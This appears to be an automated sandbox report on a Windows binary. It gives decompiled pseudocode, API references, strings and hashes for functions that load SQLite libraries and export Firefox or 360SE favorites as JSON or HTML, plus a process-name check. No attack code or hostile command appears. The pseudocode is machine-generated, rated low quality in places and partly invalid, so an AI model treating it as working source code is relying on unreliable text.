						asm("sbb esi, esi");
						return E01159250( !( ~_t75) & _t67, _t67, _v8 ^ _t80, _t72, _t73,  !( ~_t75) & _t67);
					}
					_push(L"sqlite3.dll");
					E01153280( &_v528, 0x104, L"%s\\%s", _v1052);
					_t35 =  &_v528;
					L4:
					_t66 = LoadLibraryExW(_t35, _t75, 0x1100); // executed
					 *_t73 = _t66;
					goto L5;
				}
				_t75 = 0;
				goto L4;
			}

0x01153367
0x01153372
0x01153379
0x01153380
0x01153386
0x01153388
0x0115338e
0x01153393
0x0115339c
0x011533b4
0x011533b9
0x011533d1
0x011533df
0x011533e4
0x011533ef
0x011533fa
0x01153400
0x01153404
0x0115343f
0x01153442
0x01153587
0x0115358b
0x01153590
0x01153590
0x01153448
0x0115345c
0x0115346f
0x01153482
0x01153495
0x011534a8
0x011534bb
0x011534cb
0x011534de
0x011534f1
0x01153501
0x01153511
0x01153524
0x01153537
0x0115354a
0x0115355d
0x01153570
0x0115357c
0x0115357c
0x01153598
0x011535a4
0x011535a4
0x011535ab
0x011535bf
0x011535bf
0x01153406
0x01153422
0x0115342a
0x01153430
0x01153437
0x0115343d
0x00000000
0x0115343d
0x01153395
0x00000000

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000000), ref: 011533E4
LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 011533FA
LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 01153437
GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0115344F
GetProcAddress.KERNEL32(?,sqlite3_open_v2), ref: 01153462
GetProcAddress.KERNEL32(?,sqlite3_open16), ref: 01153475
GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 01153488
GetProcAddress.KERNEL32(?,sqlite3_free), ref: 0115349B
GetProcAddress.KERNEL32(?,sqlite3_close), ref: 011534AE
GetProcAddress.KERNEL32(?,sqlite3_prepare_v2), ref: 011534BE
GetProcAddress.KERNEL32(?,sqlite3_prepare16_v2), ref: 011534D1
GetProcAddress.KERNEL32(?,sqlite3_column_count), ref: 011534E4
GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 011534F4
GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 01153504
GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 01153517
GetProcAddress.KERNEL32(?,sqlite3_column_text16), ref: 0115352A
GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0115353D
GetProcAddress.KERNEL32(?,sqlite3_reset), ref: 01153550
GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 01153563
GetProcAddress.KERNEL32(?,sqlite3_close), ref: 01153576

Strings

sqlite3_open_v2, xrefs: 01153455
sqlite3_column_text, xrefs: 0115350A
sqlite3_column_int, xrefs: 011534EA
mozcrt19.dll, xrefs: 0115339C
sqlite3_free, xrefs: 0115348E
sqlite3_finalize, xrefs: 01153556
sqlite3_column_count, xrefs: 011534D7
%s\%s, xrefs: 011533A2, 011533AD, 011533CA, 01153417
sqlite3_column_int64, xrefs: 011534FA
sqlite3_prepare16_v2, xrefs: 011534C4
sqlite3_reset, xrefs: 01153543
sqlite3_prepare_v2, xrefs: 011534B4
sqlite3_open, xrefs: 01153448
mozsqlite3.dll, xrefs: 011533B9
sqlite3_exec, xrefs: 0115347B
sqlite3_close, xrefs: 011534A1, 01153569
sqlite3_step, xrefs: 01153530
sqlite3_column_text16, xrefs: 0115351D
sqlite3.dll, xrefs: 01153406
sqlite3_open16, xrefs: 01153468

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: %s\%s$mozcrt19.dll$mozsqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_count$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_free$sqlite3_open$sqlite3_open16$sqlite3_open_v2$sqlite3_prepare16_v2$sqlite3_prepare_v2$sqlite3_reset$sqlite3_step
API String ID: 2238633743-1379368381
Opcode ID: 967a11634be7632f2bb69705fe2357171e4291a020bf9c37c67660afdb7e7f02
Instruction ID: 3f7f814c27b8e53bf609746ab0d62a47170522ff88c5c720f3765a527a169e73
Opcode Fuzzy Hash: 967a11634be7632f2bb69705fe2357171e4291a020bf9c37c67660afdb7e7f02
Instruction Fuzzy Hash: F4515CB5A41316FBCBAA9FB1C848B86BF75BB08791F104569FA35D3200D77152A0CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01159380, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01159380() {

				SetUnhandledExceptionFilter(E01159330); // executed
				return 0;
			}

0x01159385
0x0115938d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00009330), ref: 01159385

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 43aa5e87262a4443aacb8f499c53e17ec3facd924761919c16418ccfc0476d74
Instruction ID: 13aa72fec2beb0dd758f08fe9b03e30c8e1593274d3a62ef85c6fe144b905cf5
Opcode Fuzzy Hash: 43aa5e87262a4443aacb8f499c53e17ec3facd924761919c16418ccfc0476d74
Instruction Fuzzy Hash: D79002602A920CDA8B981771580D60726A16A4850AB8119A4A471C4149EB904040D616

Uniqueness

Uniqueness Score: -1.00%

Function 011559D4, Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 308
memoryCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E011559D4(WCHAR* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v532;
				char _v544;
				char _v1052;
				char _v1076;
				char _v1088;
				char _v1120;
				char _v1128;
				char _v1148;
				char _v1584;
				char _v1608;
				char _v1640;
				char _v1648;
				char _v1668;
				char _v2116;
				char _v2128;
				void* _v2136;
				signed int _v2140;
				char _v2148;
				char _v2156;
				short _v2168;
				short _v2176;
				char _v2180;
				char _v2188;
				char _v2196;
				short _v2200;
				short _v2208;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				int _t75;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t90;
				signed int _t95;
				signed int _t100;
				char* _t102;
				char* _t103;
				char* _t104;
				void* _t106;
				void* _t108;
				signed char* _t110;
				signed char _t112;
				intOrPtr _t115;
				void* _t116;
				WCHAR* _t124;
				void* _t144;
				WCHAR* _t147;
				void* _t150;
				signed int _t153;
				void* _t158;
				signed int _t159;
				void* _t175;

				_t175 = __fp0;
				_t134 = __edx;
				_t161 = (_t159 & 0xfffffff8) - 0x85c;
				_t58 =  *0x115a064; // 0xc03c63c6
				_v8 = _t58 ^ (_t159 & 0xfffffff8) - 0x0000085c;
				_t115 = _a8;
				E01158F3B(_t58 ^ (_t159 & 0xfffffff8) - 0x0000085c);
				if( *0x115a4b0 != 2 ||  *0x115a4a4 != 6 ||  *0x115a4a8 != 1) {
					L6:
					if(_a4 != 4) {
						__eflags = _a4 - 7;
						if(_a4 != 7) {
							goto L44;
						}
						E0115587C();
						_t64 =  &_v532;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						__imp__#215( *((intOrPtr*)(_t115 + 0x18)), _t64, 0x104);
						__eflags = _t64;
						if(_t64 != 0) {
							_t100 =  &_v544;
							__imp__IIDFromString(_t100,  &_v2148);
							__eflags = _t100;
							if(_t100 < 0) {
								_t134 = L"ConvertUserInputId";
								E01154601(0x11519c4, L"ConvertUserInputId", _t100, 0);
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E011558FA(_t115, 0x11519c4, 0x115aa1c,  &_v2148);
						_t147 = 0x104;
						_t66 =  &_v1584;
						_t153 = 0x80070057;
						__imp__#215( *((intOrPtr*)(_t115 + 4)), _t66, 0x104);
						__eflags = _t66;
						if(_t66 == 0) {
							L43:
							E0115595B(_t115, _t153, _t147);
							__imp__EventUnregister( *0x115a018,  *0x115a01c);
							__eflags = 0;
							 *0x115a018 = 0;
							 *0x115a01c = 0;
							 *0x115a000 = 0;
							goto L44;
						} else {
							_t69 =  &_v1076;
							__imp__#215( *((intOrPtr*)(_t115 + 8)), _t69, 0x104);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L43;
							}
							_t70 =  &_v2128;
							__imp__#215( *((intOrPtr*)(_t115 + 0xc)), _t70, 0x104);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L43;
							}
							_t71 =  &_v2156;
							__imp__#215( *((intOrPtr*)(_t115 + 0x14)), _t71, 8);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L43;
							}
							_t73 = StrCmpNIW( &_v2168, L"FIREFOX", 7);
							__eflags = _t73;
							if(_t73 != 0) {
								_t147 = L"360SE";
								_t75 = StrCmpNIW( &_v2176, _t147, 5);
								__eflags = _t75;
								if(_t75 != 0) {
									goto L43;
								}
								_t77 = E01153367(0x115a7a8, _t134, 1,  &_v1648);
								__eflags = _t77;
								if(_t77 < 0) {
									L40:
									_push(0x11519c4);
									_push( &_v1648);
									_push( &_v1128);
									_push(_t77);
									_t124 = _t147;
									L41:
									_t134 = L"InitDatabase";
									L42:
									E011546A2(_t124, _t134);
									goto L43;
								}
								_t77 = E011535C2(0x115a7a8,  &_v1128);
								__eflags = _t77;
								if(_t77 < 0) {
									goto L40;
								}
								_t80 =  &_v2196;
								__imp__#215( *((intOrPtr*)(_t115 + 0x10)), _t80, 5);
								__eflags = _t80;
								if(_t80 == 0) {
									goto L43;
								}
								__eflags = StrCmpNIW( &_v2208, L"JSON", 4);
								if(__eflags != 0) {
									goto L43;
								}
								_t83 = E011556A6( &_v2188, __eflags);
								__eflags = _t83;
								if(_t83 >= 0) {
									goto L43;
								}
								_t124 = _t147;
								_push(0x11519c4);
								_push( &_v1668);
								_push( &_v1148);
								_push(_t83);
								_t134 = L"ExportFavoritesJson";
								goto L42;
							}
							_t147 = 0x115a540;
							_t153 = E01153367(0x115a540, _t134, 1,  &_v1640);
							__eflags = _t153;
							if(_t153 < 0) {
								L32:
								_push(0x11519c4);
								_push( &_v1640);
								_t124 = L"FIREFOX";
								_push( &_v1120);
								_push(_t153);
								goto L41;
							}
							_t153 = E011535C2(0x115a540,  &_v1120);
							__eflags = _t153;
							if(_t153 < 0) {
								goto L32;
							}
							_t90 =  &_v2188;
							_t153 = 0x80070057;
							__imp__#215( *((intOrPtr*)(_t115 + 0x10)), _t90, 5);
							__eflags = _t90;
							if(_t90 == 0) {
								goto L43;
							}
							__eflags = StrCmpNIW( &_v2200, L"JSON", 4);
							if(__eflags != 0) {
								__eflags = StrCmpNIW( &_v2208, L"HTML", 4);
								if(__eflags != 0) {
									goto L43;
								}
								_t95 = E0115441E( &_v2188, __eflags, _t175);
								asm("sbb esi, esi");
								_t153 = ( ~_t95 & 0x7fffbffb) + 0x80004005;
								__eflags = _t95;
								if(_t95 != 0) {
									goto L43;
								}
								_push( &_v2188);
								_push(0x11519c4);
								_push(0x11519c4);
								_t134 = L"ExportFavoritesHTML";
								L28:
								_push(_t153);
								_t124 = L"FIREFOX";
								goto L42;
							}
							_t153 = E01154B60( &_v2180, _t134, __eflags);
							__eflags = _t153;
							if(_t153 >= 0) {
								goto L43;
							}
							_push( &_v2180);
							_push(0x11519c4);
							_push(0x11519c4);
							_t134 = L"ExportFavoritesJson";
							goto L28;
						}
					} else {
						_t102 =  &_v1052;
						__imp__#215( *((intOrPtr*)(_t115 + 4)), _t102, 0x104);
						if(_t102 != 0) {
							_t103 =  &_v1584;
							__imp__#215( *((intOrPtr*)(_t115 + 8)), _t103, 0x104);
							if(_t103 != 0) {
								_t104 =  &_v2116;
								__imp__#215( *((intOrPtr*)(_t115 + 0xc)), _t104, 0x104);
								if(_t104 != 0) {
									_t106 = E01153367(0x115a540, _t134, 0,  &_v1088); // executed
									if(_t106 >= 0) {
										_t108 = E011535C2(0x115a540,  &_v1608);
										_t173 = _t108;
										if(_t108 >= 0) {
											E0115441E( &_v2128, _t173, _t175);
										}
									}
								}
							}
						}
						L44:
						_pop(_t144);
						_pop(_t150);
						_pop(_t116);
						return E01159250(0, _t116, _v8 ^ _t161, _t134, _t144, _t150);
					}
				} else {
					_t110 =  &_v2140;
					_v2140 = 0;
					__imp__rand_s();
					0x11519c4 = _t110;
					if(_t110 != 0) {
						goto L6;
					}
					_t158 = 0;
					_t112 = (_v2140 & 0x000000ff) + 1;
					_v2140 = _t112;
					if(_t112 == 0) {
						goto L6;
					} else {
						goto L5;
					}
					do {
						L5:
						VirtualAlloc(0, 0x10000, 0x2000, 1);
						_t158 = _t158 + 1;
					} while (_t158 < _v2140);
					goto L6;
				}
			}

0x011559d4
0x011559d4
0x011559dc
0x011559e2
0x011559e9
0x011559f1
0x011559f6
0x01155a04
0x01155a56
0x01155a5a
0x01155af2
0x01155af6
0x00000000
0x00000000
0x01155afc
0x01155b0f
0x01155b1a
0x01155b1b
0x01155b1c
0x01155b1d
0x01155b1e
0x01155b24
0x01155b26
0x01155b2d
0x01155b35
0x01155b3b
0x01155b3d
0x01155b42
0x01155b4c
0x01155b4c
0x01155b3d
0x01155b5a
0x01155b5b
0x01155b5c
0x01155b5d
0x01155b5e
0x01155b63
0x01155b68
0x01155b74
0x01155b79
0x01155b7f
0x01155b81
0x01155db9
0x01155dbb
0x01155dcc
0x01155dd2
0x01155dd4
0x01155dd9
0x01155dde
0x00000000
0x01155b87
0x01155b88
0x01155b93
0x01155b99
0x01155b9b
0x00000000
0x00000000
0x01155ba2
0x01155baa
0x01155bb0
0x01155bb2
0x00000000
0x00000000
0x01155bba
0x01155bc2
0x01155bc8
0x01155bca
0x00000000
0x00000000
0x01155bdc
0x01155be2
0x01155be4
0x01155cf8
0x01155d03
0x01155d09
0x01155d0b
0x00000000
0x00000000
0x01155d20
0x01155d25
0x01155d27
0x01155d96
0x01155da2
0x01155da3
0x01155dab
0x01155dac
0x01155dad
0x01155daf
0x01155daf
0x01155db4
0x01155db4
0x00000000
0x01155db4
0x01155d36
0x01155d3b
0x01155d3d
0x00000000
0x00000000
0x01155d41
0x01155d49
0x01155d4f
0x01155d51
0x00000000
0x00000000
0x01155d65
0x01155d67
0x00000000
0x00000000
0x01155d6d
0x01155d72
0x01155d74
0x00000000
0x00000000
0x01155d7b
0x01155d7d
0x01155d85
0x01155d8d
0x01155d8e
0x01155d8f
0x00000000
0x01155d8f
0x01155bf1
0x01155c00
0x01155c02
0x01155c04
0x01155cd5
0x01155ce1
0x01155ce2
0x01155cea
0x01155cef
0x01155cf0
0x00000000
0x01155cf0
0x01155c19
0x01155c1b
0x01155c1d
0x00000000
0x00000000
0x01155c25
0x01155c29
0x01155c32
0x01155c38
0x01155c3a
0x00000000
0x00000000
0x01155c52
0x01155c54
0x01155c97
0x01155c99
0x00000000
0x00000000
0x01155ca3
0x01155cac
0x01155cb4
0x01155cba
0x01155cbc
0x00000000
0x00000000
0x01155ccb
0x01155ccc
0x01155ccd
0x01155cce
0x01155c7a
0x01155c7a
0x01155c7b
0x00000000
0x01155c7b
0x01155c5f
0x01155c61
0x01155c63
0x00000000
0x00000000
0x01155c72
0x01155c73
0x01155c74
0x01155c75
0x00000000
0x01155c75
0x01155a60
0x01155a65
0x01155a71
0x01155a79
0x01155a80
0x01155a8b
0x01155a93
0x01155a9a
0x01155aa2
0x01155aaa
0x01155ac0
0x01155ac7
0x01155ad7
0x01155adc
0x01155ade
0x01155ae8
0x01155ae8
0x01155ade
0x01155ac7
0x01155aaa
0x01155a93
0x01155de3
0x01155dec
0x01155ded
0x01155dee
0x01155df9
0x01155df9
0x01155a18
0x01155a18
0x01155a1c
0x01155a21
0x01155a27
0x01155a2a
0x00000000
0x00000000
0x01155a31
0x01155a33
0x01155a36
0x01155a3a
0x00000000
0x00000000
0x00000000
0x00000000
0x01155a3c
0x01155a3c
0x01155a49
0x01155a4f
0x01155a50
0x00000000
0x01155a3c

APIs

Part of subcall function 01158F3B: InitOnceExecuteOnce.KERNEL32(0115A53C,01158F20,00000000,00000000,011559FB), ref: 01158F49

rand_s.MSVCRT ref: 01155A21
VirtualAlloc.KERNEL32(00000000,00010000,00002000,00000001), ref: 01155A49
SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 01155A71
SHAnsiToUnicode.SHLWAPI(00000004,?,00000104), ref: 01155A8B
SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 01155AA2
SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 01155B1E
IIDFromString.OLE32(?,?), ref: 01155B35
SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 01155B79
SHAnsiToUnicode.SHLWAPI(00000007,?,00000104), ref: 01155B93
SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 01155BAA
SHAnsiToUnicode.SHLWAPI(?,?,00000008), ref: 01155BC2
StrCmpNIW.SHLWAPI(?,FIREFOX,00000007), ref: 01155BDC
SHAnsiToUnicode.SHLWAPI(?,?,00000005), ref: 01155C32
StrCmpNIW.SHLWAPI(?,JSON,00000004), ref: 01155C4C
StrCmpNIW.SHLWAPI(?,HTML,00000004), ref: 01155C91
StrCmpNIW.SHLWAPI(?,360SE,00000005), ref: 01155D03
SHAnsiToUnicode.SHLWAPI(?,?,00000005), ref: 01155D49
StrCmpNIW.SHLWAPI(?,JSON,00000004), ref: 01155D5F
EventUnregister.ADVAPI32 ref: 01155DCC

Strings

JSON, xrefs: 01155C42, 01155D55
ConvertUserInputId, xrefs: 01155B42
FIREFOX, xrefs: 01155BD2, 01155C7B, 01155CEA
ExportFavoritesHTML, xrefs: 01155CCE
360SE, xrefs: 01155CF8, 01155D01
ExportFavoritesJson, xrefs: 01155C75, 01155D8F
InitDatabase, xrefs: 01155DAF
HTML, xrefs: 01155C87

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: AnsiUnicode$Once$AllocEventExecuteFromInitStringUnregisterVirtualrand_s
String ID: 360SE$ConvertUserInputId$ExportFavoritesHTML$ExportFavoritesJson$FIREFOX$HTML$InitDatabase$JSON
API String ID: 1990097256-1970198859
Opcode ID: 78520ea5e256c7e6c8fb97143da9a6ecc6ee21770be33ce44bf11ff05c914889
Instruction ID: 75c8b4a648cb57c84ff22c8594790305d6c142ed87569be7aacd2eb25693ff74
Opcode Fuzzy Hash: 78520ea5e256c7e6c8fb97143da9a6ecc6ee21770be33ce44bf11ff05c914889
Instruction Fuzzy Hash: 61A19B76204341EBDBEDDB61DC88AAF7BEEAF84614F004528EE75D7140EB30D9458B61

Uniqueness

Uniqueness Score: -1.00%

Function 01159083, Relevance: 10.6, APIs: 7, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E01159083() {
				int _t11;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t23;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t38;
				WCHAR _t39;
				void* _t40;
				intOrPtr _t41;
				intOrPtr* _t43;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t58;

				_push(0x10);
				_push(0x1159958);
				E0115963C(_t23, _t38, _t40);
				 *((intOrPtr*)(_t45 - 4)) = 0;
				_t41 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t39 = 0;
				while(1) {
					_t25 = _t41;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t41) {
						Sleep(0x3e8);
						continue;
					} else {
						_t43 = 1;
						_t39 = 1;
					}
					L6:
					_t51 =  *0x115aa58 - _t43; // 0x2
					if(_t51 != 0) {
						__eflags =  *0x115aa58; // 0x2
						if(__eflags != 0) {
							 *0x115a084 = _t43;
							goto L12;
						} else {
							 *0x115aa58 = _t43;
							_t21 = E011591F2(_t25, 0x11510d4, 0x11510e0); // executed
							__eflags = _t21;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						_push(0x1f);
						L01159434();
						L12:
						_t52 =  *0x115aa58 - _t43; // 0x2
						if(_t52 == 0) {
							_push(0x11510d0);
							_push(0x11510b0);
							L01159636();
							 *0x115aa58 = 2;
						}
						if(_t39 == 0) {
							 *0x115aa54 = 0;
						}
						_t55 =  *0x115aa64;
						if( *0x115aa64 != 0 && E01159490(_t55, 0x115aa64) != 0) {
							_t43 =  *0x115aa64; // 0x0
							 *0x115b1b4(0, 2, 0);
							 *_t43();
						}
						_push( *0x115a090);
						_t11 = E011559D4(0x115aa54, _t58,  *0x115a088,  *0x115a08c); // executed
						 *0x115a080 = _t11;
						if( *0x115a098 != 0) {
							__eflags =  *0x115a084;
							if( *0x115a084 == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
							L24:
							return E01159684(0, _t39, _t43);
						} else {
							exit(_t11); // executed
							_t26 =  *((intOrPtr*)(_t45 - 0x14));
							_t15 =  *((intOrPtr*)( *_t26));
							 *((intOrPtr*)(_t45 - 0x20)) = _t15;
							_push(_t26);
							_push(_t15);
							L0115938E();
							return _t15;
						}
					}
				}
				_t43 = 1;
				__eflags = 1;
				goto L6;
			}

0x01159083
0x01159085
0x0115908a
0x01159091
0x0115909a
0x0115909d
0x0115909f
0x011590a4
0x011590a8
0x011590ae
0x00000000
0x00000000
0x011590b2
0x011590c0
0x00000000
0x011590b4
0x011590b6
0x011590b7
0x011590b7
0x011590cb
0x011590cb
0x011590d1
0x011590dd
0x011590e3
0x01159111
0x00000000
0x011590e5
0x011590e5
0x011590f5
0x011590fc
0x011590fe
0x00000000
0x01159100
0x01159100
0x00000000
0x01159107
0x011590fe
0x011590d3
0x011590d3
0x011590d5
0x01159117
0x01159117
0x0115911d
0x0115911f
0x01159124
0x01159129
0x01159130
0x01159130
0x0115913c
0x01159145
0x01159145
0x01159147
0x0115914e
0x01159163
0x0115916b
0x01159171
0x01159171
0x01159173
0x01159185
0x0115918d
0x01159199
0x011591d1
0x011591d8
0x011591da
0x011591e0
0x011591e5
0x011591ec
0x011591f1
0x0115919b
0x0115919c
0x011591a2
0x011591a7
0x011591a9
0x011591ac
0x011591ad
0x011591ae
0x011591b5
0x011591b5
0x01159199
0x011590d1
0x011590ca
0x011590ca
0x00000000

APIs

Sleep.KERNEL32(000003E8,01159958,00000010), ref: 011590C0
_amsg_exit.MSVCRT ref: 011590D5
_initterm.MSVCRT ref: 01159129
__IsNonwritableInCurrentImage.LIBCMT ref: 01159155
exit.KERNELBASE ref: 0115919C
_XcptFilter.MSVCRT ref: 011591AE

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
String ID:
API String ID: 796493780-0
Opcode ID: 5a42b5d3632fe8018a608c132d4cc3a056a22d4404ba213f0ee40978411fae14
Instruction ID: 8d99d3f5d19c5ab530cea9c9d94eb841211655254300a3d83946823af017439b
Opcode Fuzzy Hash: 5a42b5d3632fe8018a608c132d4cc3a056a22d4404ba213f0ee40978411fae14
Instruction Fuzzy Hash: A631C77068036ADFDBBE9F25F9897193B64AF08728F10023DED3597684DB344880D756

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01156422, Relevance: 91.2, APIs: 27, Strings: 25, Instructions: 248COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 01156453
PathFindFileNameW.SHLWAPI(?), ref: 01156468
_wcsicmp.MSVCRT ref: 01156476
_wcsicmp.MSVCRT ref: 0115648E

Strings

pickerhost.exe, xrefs: 0115663C
NETPLWIZ.EXE, xrefs: 0115655F
IEUTLAUNCH.EXE, xrefs: 011564FA
browser_broker.exe, xrefs: 0115666E
SYSPREP.EXE, xrefs: 011564A2
microsoftedge.exe, xrefs: 011565F3
LOADER42.EXE, xrefs: 011564CE
FAKEVIRTUALSURFACETESTAPP.EXE, xrefs: 01156534
Te.ProcessHost.exe, xrefs: 01156522
EXPLORER.EXE, xrefs: 011564B8
RESTOREOPTIN.EXE, xrefs: 011565C3
USERACCOUNTBROKER.EXE, xrefs: 01156578
IEXPLORE.EXE, xrefs: 01156470
MSFEEDSSYNC.EXE, xrefs: 01156488
jshost.exe, xrefs: 01156687
DCIScanner, xrefs: 011565DC
MSHTMPAD.EXE, xrefs: 01156591
MSOOBE.EXE, xrefs: 01156546
microsoftedgecp.exe, xrefs: 0115660C
TE.EXE, xrefs: 01156510
FirstLogonAnim.exe, xrefs: 011565AA
microsoftedgesh.exe, xrefs: 01156625
authhost.exe, xrefs: 011566A0
msvsmon.exe, xrefs: 01156655
WWAHOST.EXE, xrefs: 011564E4

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: FileName_wcsicmp$FindModulePath
String ID: DCIScanner$EXPLORER.EXE$FAKEVIRTUALSURFACETESTAPP.EXE$FirstLogonAnim.exe$IEUTLAUNCH.EXE$IEXPLORE.EXE$LOADER42.EXE$MSFEEDSSYNC.EXE$MSHTMPAD.EXE$MSOOBE.EXE$NETPLWIZ.EXE$RESTOREOPTIN.EXE$SYSPREP.EXE$TE.EXE$Te.ProcessHost.exe$USERACCOUNTBROKER.EXE$WWAHOST.EXE$authhost.exe$browser_broker.exe$jshost.exe$microsoftedge.exe$microsoftedgecp.exe$microsoftedgesh.exe$msvsmon.exe$pickerhost.exe
API String ID: 3065369885-314592976
Opcode ID: d9b8ee4301fd8b6468ed9eb5c3e9c03ed885911155fc483af05f4afeb8397590
Instruction ID: 52ff65c8a68befd6eeb99f6abae3d3ddbd409f5e673de3259f509f0b61c5d55e
Opcode Fuzzy Hash: d9b8ee4301fd8b6468ed9eb5c3e9c03ed885911155fc483af05f4afeb8397590
Instruction Fuzzy Hash: E3617C322CCB02FAF7ED1535BC16B563B959B06665F90402AFD31E10C6EF76A140C6AE

Uniqueness

Uniqueness Score: -1.00%

Function 01159583, Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01159583() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x115a064; // 0xc03c63c6
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x115a064 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x115a064 = _t39;
				}
				_t37 =  !_t36;
				 *0x115a068 = _t37;
				return _t37;
			}

0x0115958b
0x0115958f
0x01159593
0x011595a6
0x011595b0
0x011595bc
0x011595c5
0x011595ce
0x011595df
0x011595e6
0x011595f2
0x011595f5
0x011595f9
0x01159603
0x01159608
0x01159608
0x0115960a
0x0115960a
0x01159610
0x01159613
0x0115961c

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 011595B0
GetCurrentProcessId.KERNEL32 ref: 011595BF
GetCurrentThreadId.KERNEL32 ref: 011595C8
GetTickCount.KERNEL32 ref: 011595D1
QueryPerformanceCounter.KERNEL32(?), ref: 011595E6

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
